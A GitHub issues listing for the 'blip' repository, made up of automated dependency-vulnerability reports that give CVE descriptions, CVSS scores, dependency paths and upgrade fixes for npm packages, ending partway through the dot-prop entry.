blip's People

Contributors

anderspitman, andrew-dixon, benderr-tp, bewest, cheddar, clintonium-119, courtenayhuffman, coyotte508, darinkrauss, dependabot[bot], derrickburns, dotmr, gordyd, hntrdglss, howardlook, ianjorgensen, jebeck, jehernandezrodriguez, jh-bate, jpreillymb, kentquirk, krystophv, mortonfox, mrinnetmaki, nicolashery, pazaan, petersampson, rspier, snyk-bot, ursooperduper

blip's Issues

CVE-2021-33623 (High) detected in trim-newlines-3.0.0.tgz, trim-newlines-1.0.0.tgz

CVE-2021-33623 - High Severity Vulnerability

Vulnerable Libraries - trim-newlines-3.0.0.tgz, trim-newlines-1.0.0.tgz

trim-newlines-3.0.0.tgz

Trim newlines from the start and/or end of a string

Library home page: https://registry.npmjs.org/trim-newlines/-/trim-newlines-3.0.0.tgz

Dependency Hierarchy:

  • stylelint-13.2.0.tgz (Root Library)
    • meow-6.0.1.tgz
      • trim-newlines-3.0.0.tgz (Vulnerable Library)

trim-newlines-1.0.0.tgz

Trim newlines from the start and/or end of a string

Library home page: https://registry.npmjs.org/trim-newlines/-/trim-newlines-1.0.0.tgz

Dependency Hierarchy:

  • karma-coverage-1.1.2.tgz (Root Library)
    • dateformat-1.0.12.tgz
      • meow-3.7.0.tgz
        • trim-newlines-1.0.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.

Publish Date: 2021-05-28

URL: CVE-2021-33623

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33623

Release Date: 2021-05-28

Fix Resolution (trim-newlines): 3.0.1

Direct dependency fix Resolution (stylelint): 13.2.1

Fix Resolution (trim-newlines): 3.0.1

Direct dependency fix Resolution (karma-coverage): 2.0.2

CVE-2018-1000620 (High) detected in cryptiles-2.0.5.tgz

CVE-2018-1000620 - High Severity Vulnerability

Vulnerable Library - cryptiles-2.0.5.tgz

General purpose crypto utilities

Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • request-2.81.0.tgz
        • hawk-3.1.3.tgz
          • cryptiles-2.0.5.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Eran Hammer's cryptiles, version 4.1.1 and earlier, contains a CWE-331 (Insufficient Entropy) vulnerability in the randomDigits() method, which makes it more likely that an attacker can brute-force a value that was supposed to be random. Exploitability depends upon the calling application. This vulnerability appears to have been fixed in 4.1.2.

Publish Date: 2018-07-09

URL: CVE-2018-1000620

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000620

Release Date: 2018-07-09

Fix Resolution: v4.1.2

CVE-2020-28168 (Medium) detected in axios-0.15.3.tgz, axios-0.19.0.tgz

CVE-2020-28168 - Medium Severity Vulnerability

Vulnerable Libraries - axios-0.15.3.tgz, axios-0.19.0.tgz

axios-0.15.3.tgz

Promise based HTTP client for the browser and node.js

Library home page: https://registry.npmjs.org/axios/-/axios-0.15.3.tgz

Dependency Hierarchy:

  • github-api-3.0.0.tgz (Root Library)
    • axios-0.15.3.tgz (Vulnerable Library)

axios-0.19.0.tgz

Promise based HTTP client for the browser and node.js

Library home page: https://registry.npmjs.org/axios/-/axios-0.19.0.tgz

Dependency Hierarchy:

  • addon-actions-5.3.19.tgz (Root Library)
    • react-inspector-4.0.0.tgz
      • storybook-chromatic-2.2.2.tgz
        • localtunnel-1.10.1.tgz
          • axios-0.19.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.

Publish Date: 2020-11-06

URL: CVE-2020-28168

CVSS 3 Score Details (5.9)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Release Date: 2020-11-06

Fix Resolution (axios): 0.21.1

Direct dependency fix Resolution (github-api): 3.4.0

Fix Resolution (axios): 0.21.1

Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20

CVE-2021-23383 (High) detected in handlebars-4.7.6.tgz

CVE-2021-23383 - High Severity Vulnerability

Vulnerable Library - handlebars-4.7.6.tgz

Handlebars provides the power necessary to let you build semantic templates effectively with no frustration

Library home page: https://registry.npmjs.org/handlebars/-/handlebars-4.7.6.tgz

Dependency Hierarchy:

  • karma-coverage-1.1.2.tgz (Root Library)
    • istanbul-0.4.5.tgz
      • handlebars-4.7.6.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package handlebars before 4.7.7 is vulnerable to Prototype Pollution when certain compile options are selected to compile templates coming from an untrusted source.

Publish Date: 2021-05-04

URL: CVE-2021-23383

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383

Release Date: 2021-05-04

Fix Resolution (handlebars): 4.7.7

Direct dependency fix Resolution (karma-coverage): 2.0.0

CVE-2018-7651 (Medium) detected in ssri-4.1.6.tgz

CVE-2018-7651 - Medium Severity Vulnerability

Vulnerable Library - ssri-4.1.6.tgz

Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.

Library home page: https://registry.npmjs.org/ssri/-/ssri-4.1.6.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • ssri-4.1.6.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

index.js in the ssri module before 5.2.2 for Node.js is prone to a regular expression denial of service vulnerability in strict mode functionality via a long base64 hash string.

Publish Date: 2018-03-04

URL: CVE-2018-7651

CVSS 3 Score Details (5.9)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7651

Release Date: 2018-03-04

Fix Resolution: 5.2.2

CVE-2021-32723 (Medium) detected in prismjs-1.17.1.tgz, prismjs-1.19.0.tgz

CVE-2021-32723 - Medium Severity Vulnerability

Vulnerable Libraries - prismjs-1.17.1.tgz, prismjs-1.19.0.tgz

prismjs-1.17.1.tgz

Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.

Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.17.1.tgz

Dependency Hierarchy:

  • addon-knobs-5.3.19.tgz (Root Library)
    • components-5.3.19.tgz
      • react-syntax-highlighter-11.0.2.tgz
        • refractor-2.10.1.tgz
          • prismjs-1.17.1.tgz (Vulnerable Library)

prismjs-1.19.0.tgz

Lightweight, robust, elegant syntax highlighting. A spin-off project from Dabblet.

Library home page: https://registry.npmjs.org/prismjs/-/prismjs-1.19.0.tgz

Dependency Hierarchy:

  • addon-knobs-5.3.19.tgz (Root Library)
    • components-5.3.19.tgz
      • react-syntax-highlighter-11.0.2.tgz
        • prismjs-1.19.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Prism is a syntax highlighting library. Some languages before 1.24.0 are vulnerable to Regular Expression Denial of Service (ReDoS). When Prism is used to highlight untrusted (user-given) text, an attacker can craft a string that will take a very long time to highlight. This problem has been fixed in Prism v1.24. As a workaround, do not use ASCIIDoc or ERB to highlight untrusted text. Other languages are not affected and can be used to highlight untrusted text.

Publish Date: 2021-06-28

URL: CVE-2021-32723

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: GHSA-gj77-59wh-66hg

Release Date: 2021-06-28

Fix Resolution (prismjs): 1.24.0

Direct dependency fix Resolution (@storybook/addon-knobs): 6.1.0

Fix Resolution (prismjs): 1.24.0

Direct dependency fix Resolution (@storybook/addon-knobs): 6.1.0

CVE-2020-7707 (High) detected in property-expr-2.0.2.tgz

CVE-2020-7707 - High Severity Vulnerability

Vulnerable Library - property-expr-2.0.2.tgz

tiny util for getting and setting deep object props safely

Library home page: https://registry.npmjs.org/property-expr/-/property-expr-2.0.2.tgz

Dependency Hierarchy:

  • yup-0.29.0.tgz (Root Library)
    • property-expr-2.0.2.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package property-expr before 2.0.3 is vulnerable to Prototype Pollution via the setter function.

Publish Date: 2020-08-18

URL: CVE-2020-7707

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7707

Release Date: 2020-08-18

Fix Resolution (property-expr): 2.0.3

Direct dependency fix Resolution (yup): 0.29.1

CVE-2020-28500 (Medium) detected in multiple libraries

CVE-2020-28500 - Medium Severity Vulnerability

Vulnerable Libraries - lodash-3.3.1.tgz, lodash-4.17.19.tgz, lodash-4.17.4.tgz, lodash-4.17.20.tgz, lodash-4.17.15.tgz

lodash-3.3.1.tgz

The modern build of lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-3.3.1.tgz

Dependency Hierarchy:

  • tidepool-platform-client-0.45.0.tgz (Root Library)
    • lodash-3.3.1.tgz (Vulnerable Library)

lodash-4.17.19.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.19.tgz

Dependency Hierarchy:

  • lodash-4.17.19.tgz (Vulnerable Library)

lodash-4.17.4.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • lodash-4.17.4.tgz (Vulnerable Library)

lodash-4.17.20.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.20.tgz

Dependency Hierarchy:

  • preset-env-7.11.0.tgz (Root Library)
    • types-7.11.5.tgz
      • lodash-4.17.20.tgz (Vulnerable Library)

lodash-4.17.15.tgz

Lodash modular utilities.

Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.15.tgz

Dependency Hierarchy:

  • tideline-1.24.0-control-iq.4.tgz (Root Library)
    • lodash-4.17.15.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.
Mend Note: After conducting further research, Mend has determined that CVE-2020-28500 only affects environments with versions 4.0.0 to 4.17.20 of Lodash.

Publish Date: 2021-02-15

URL: CVE-2020-28500

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28500

Release Date: 2021-02-15

Fix Resolution (lodash): 4.17.21

Direct dependency fix Resolution (@babel/preset-env): 7.11.5

CVE-2021-32640 (Medium) detected in ws-5.2.2.tgz, ws-6.2.1.tgz

CVE-2021-32640 - Medium Severity Vulnerability

Vulnerable Libraries - ws-5.2.2.tgz, ws-6.2.1.tgz

ws-5.2.2.tgz

Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js

Library home page: https://registry.npmjs.org/ws/-/ws-5.2.2.tgz

Dependency Hierarchy:

  • addon-actions-5.3.19.tgz (Root Library)
    • react-inspector-4.0.0.tgz
      • storybook-chromatic-2.2.2.tgz
        • jsdom-11.12.0.tgz
          • ws-5.2.2.tgz (Vulnerable Library)

ws-6.2.1.tgz

Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js

Library home page: https://registry.npmjs.org/ws/-/ws-6.2.1.tgz

Dependency Hierarchy:

  • webpack-dev-server-3.8.0.tgz (Root Library)
    • ws-6.2.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

ws is an open source WebSocket client and server library for Node.js. A specially crafted value of the Sec-Websocket-Protocol header can be used to significantly slow down a ws server. The vulnerability has been fixed upstream (websockets/ws@00c425e). In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options.

Publish Date: 2021-05-25

URL: CVE-2021-32640

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Origin: GHSA-6fc8-4gx4-v693

Release Date: 2021-05-25

Fix Resolution (ws): 5.2.3

Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20

Fix Resolution (ws): 6.2.2

Direct dependency fix Resolution (webpack-dev-server): 3.8.1

CVE-2021-23386 (Medium) detected in dns-packet-1.3.1.tgz

CVE-2021-23386 - Medium Severity Vulnerability

Vulnerable Library - dns-packet-1.3.1.tgz

An abstract-encoding compliant module for encoding / decoding DNS packets

Library home page: https://registry.npmjs.org/dns-packet/-/dns-packet-1.3.1.tgz

Dependency Hierarchy:

  • webpack-dev-server-3.8.0.tgz (Root Library)
    • bonjour-3.5.0.tgz
      • multicast-dns-6.2.3.tgz
        • dns-packet-1.3.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

This affects the package dns-packet before 5.2.2. It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over unencrypted network when querying crafted invalid domain names.

Publish Date: 2021-05-20

URL: CVE-2021-23386

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23386

Release Date: 2021-05-20

Fix Resolution (dns-packet): 1.3.2

Direct dependency fix Resolution (webpack-dev-server): 3.8.1

CVE-2017-18869 (Low) detected in chownr-1.0.1.tgz

CVE-2017-18869 - Low Severity Vulnerability

Vulnerable Library - chownr-1.0.1.tgz

like `chown -R`

Library home page: https://registry.npmjs.org/chownr/-/chownr-1.0.1.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • chownr-1.0.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

A TOCTOU issue in the chownr package before 1.1.0 for Node.js 10.10 could allow a local attacker to trick it into descending into unintended directories via symlink attacks.

Publish Date: 2020-06-15

URL: CVE-2017-18869

CVSS 3 Score Details (2.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18869

Release Date: 2020-06-15

Fix Resolution: 1.1.0

CVE-2019-16777 (Medium) detected in npm-2.15.12.tgz, npm-5.1.0.tgz

CVE-2019-16777 - Medium Severity Vulnerability

Vulnerable Libraries - npm-2.15.12.tgz, npm-5.1.0.tgz

npm-2.15.12.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz (Vulnerable Library)

npm-5.1.0.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Versions of the npm CLI prior to 6.13.4 are vulnerable to an Arbitrary File Overwrite. The CLI fails to prevent existing globally-installed binaries from being overwritten by other package installations. For example, if a package was installed globally and created a serve binary, any subsequent install of a package that also creates a serve binary would overwrite the previous serve binary. This behavior is still allowed in local installations and also through install scripts. This vulnerability bypasses the --ignore-scripts install option.

Publish Date: 2019-12-13

URL: CVE-2019-16777

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli

Release Date: 2020-10-09

Fix Resolution: npm - 6.13.4

CVE-2021-23343 (High) detected in path-parse-1.0.6.tgz

CVE-2021-23343 - High Severity Vulnerability

Vulnerable Library - path-parse-1.0.6.tgz

Node.js path.parse() ponyfill

Library home page: https://registry.npmjs.org/path-parse/-/path-parse-1.0.6.tgz

Dependency Hierarchy:

  • eslint-plugin-react-7.20.3.tgz (Root Library)
    • resolve-1.17.0.tgz
      • path-parse-1.0.6.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.

Publish Date: 2021-05-04

URL: CVE-2021-23343

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Release Date: 2021-05-04

Fix Resolution (path-parse): 1.0.7

Direct dependency fix Resolution (eslint-plugin-react): 7.20.4

CVE-2019-10742 (High) detected in axios-0.15.3.tgz

CVE-2019-10742 - High Severity Vulnerability

Vulnerable Library - axios-0.15.3.tgz

Promise based HTTP client for the browser and node.js

Library home page: https://registry.npmjs.org/axios/-/axios-0.15.3.tgz

Dependency Hierarchy:

  • github-api-3.0.0.tgz (Root Library)
    • axios-0.15.3.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Axios up to and including 0.18.0 allows attackers to cause a denial of service (application crash) by continuing to accept content after maxContentLength is exceeded.

Publish Date: 2019-05-07

URL: CVE-2019-10742

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Release Date: 2019-05-07

Fix Resolution (axios): 0.18.1

Direct dependency fix Resolution (github-api): 3.2.2

WS-2020-0180 (High) detected in npm-user-validate-1.0.0.tgz, npm-user-validate-0.1.5.tgz

WS-2020-0180 - High Severity Vulnerability

Vulnerable Libraries - npm-user-validate-1.0.0.tgz, npm-user-validate-0.1.5.tgz

npm-user-validate-1.0.0.tgz

User validations for npm

Library home page: https://registry.npmjs.org/npm-user-validate/-/npm-user-validate-1.0.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • npm-user-validate-1.0.0.tgz (Vulnerable Library)

npm-user-validate-0.1.5.tgz

User validations for npm

Library home page: https://registry.npmjs.org/npm-user-validate/-/npm-user-validate-0.1.5.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz
        • npm-user-validate-0.1.5.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package npm-user-validate prior to version 1.0.1 is vulnerable to ReDoS. The regex that validates a user's email takes exponentially longer to process input strings that begin with the '@' character.

Publish Date: 2020-10-16

URL: WS-2020-0180

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: GHSA-xgh6-85xh-479p

Release Date: 2020-10-16

Fix Resolution: 1.0.1

CVE-2020-28481 (Medium) detected in socket.io-2.1.1.tgz

CVE-2020-28481 - Medium Severity Vulnerability

Vulnerable Library - socket.io-2.1.1.tgz

node.js realtime framework server

Library home page: https://registry.npmjs.org/socket.io/-/socket.io-2.1.1.tgz

Dependency Hierarchy:

  • karma-3.0.0.tgz (Root Library)
    • socket.io-2.1.1.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package socket.io before 2.4.0 is vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.

Publish Date: 2021-01-19

URL: CVE-2020-28481

CVSS 3 Score Details (4.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28481

Release Date: 2021-01-19

Fix Resolution (socket.io): 2.4.0

Direct dependency fix Resolution (karma): 5.0.8

CVE-2019-16776 (High) detected in npm-5.1.0.tgz, npm-2.15.12.tgz

CVE-2019-16776 - High Severity Vulnerability

Vulnerable Libraries - npm-5.1.0.tgz, npm-2.15.12.tgz

npm-5.1.0.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz (Vulnerable Library)

npm-2.15.12.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npmi-1.0.1.tgz
      • npm-2.15.12.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. The CLI fails to prevent access to folders outside of the intended node_modules folder through the bin field. A properly constructed entry in the package.json bin field would allow a package publisher to modify and/or gain access to arbitrary files on a user's system when the package is installed. This behavior is still possible through install scripts. This vulnerability bypasses the --ignore-scripts install option.

Publish Date: 2019-12-13

URL: CVE-2019-16776

CVSS 3 Score Details (8.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli

Release Date: 2020-10-07

Fix Resolution: npm - 6.13.3; yarn - 1.21.1

CVE-2021-23382 (Medium) detected in multiple libraries

CVE-2021-23382 - Medium Severity Vulnerability

Vulnerable Libraries - postcss-7.0.32.tgz, postcss-5.2.18.tgz, postcss-6.0.23.tgz, postcss-7.0.27.tgz

postcss-7.0.32.tgz

Tool for transforming styles with JS plugins

Library home page: https://registry.npmjs.org/postcss/-/postcss-7.0.32.tgz

Dependency Hierarchy:

  • autoprefixer-9.8.4.tgz (Root Library)
    • postcss-7.0.32.tgz (Vulnerable Library)

postcss-5.2.18.tgz

Tool for transforming styles with JS plugins

Library home page: https://registry.npmjs.org/postcss/-/postcss-5.2.18.tgz

Dependency Hierarchy:

  • babel-plugin-styled-components-css-namespace-1.0.0-rc4.tgz (Root Library)
    • postcss-parent-selector-1.0.0.tgz
      • postcss-5.2.18.tgz (Vulnerable Library)

postcss-6.0.23.tgz

Tool for transforming styles with JS plugins

Library home page: https://registry.npmjs.org/postcss/-/postcss-6.0.23.tgz

Dependency Hierarchy:

  • css-loader-1.0.0.tgz (Root Library)
    • postcss-6.0.23.tgz (Vulnerable Library)

postcss-7.0.27.tgz

Tool for transforming styles with JS plugins

Library home page: https://registry.npmjs.org/postcss/-/postcss-7.0.27.tgz

Dependency Hierarchy:

  • stylelint-13.2.0.tgz (Root Library)
    • postcss-7.0.27.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

The package postcss before 8.2.13 is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern /*\s* sourceMappingURL=(.*).

Publish Date: 2021-04-26

URL: CVE-2021-23382

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23382

Release Date: 2021-04-26

Fix Resolution (postcss): 7.0.36

Direct dependency fix Resolution (autoprefixer): 9.8.5

Fix Resolution (postcss): 7.0.36

Direct dependency fix Resolution (css-loader): 2.0.0

Fix Resolution (postcss): 7.0.36

Direct dependency fix Resolution (stylelint): 13.2.1

CVE-2020-28502 (High) detected in xmlhttprequest-ssl-1.5.5.tgz

CVE-2020-28502 - High Severity Vulnerability

Vulnerable Library - xmlhttprequest-ssl-1.5.5.tgz

XMLHttpRequest for Node

Library home page: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-1.5.5.tgz

Dependency Hierarchy:

  • karma-3.0.0.tgz (Root Library)
    • socket.io-2.1.1.tgz
      • socket.io-client-2.1.1.tgz
        • engine.io-client-3.2.1.tgz
          • xmlhttprequest-ssl-1.5.5.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.

Publish Date: 2021-03-05

URL: CVE-2020-28502

CVSS 3 Score Details (8.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

Suggested Fix

Type: Upgrade version

Origin: GHSA-h4j5-c7cj-74xg

Release Date: 2021-03-05

Fix Resolution (xmlhttprequest-ssl): 1.6.1

Direct dependency fix Resolution (karma): 5.0.8

CVE-2020-8116 (High) detected in dot-prop-4.2.0.tgz

CVE-2020-8116 - High Severity Vulnerability

Vulnerable Library - dot-prop-4.2.0.tgz

Get, set, or delete a property from a nested object using a dot path

Library home page: https://registry.npmjs.org/dot-prop/-/dot-prop-4.2.0.tgz

Dependency Hierarchy:

  • gitbook-cli-2.3.2.tgz (Root Library)
    • npm-5.1.0.tgz
      • update-notifier-2.2.0.tgz
        • configstore-3.1.2.tgz
          • dot-prop-4.2.0.tgz (Vulnerable Library)

Found in base branch: develop

Vulnerability Details

Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.

Publish Date: 2020-02-04

URL: CVE-2020-8116

CVSS 3 Score Details (7.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
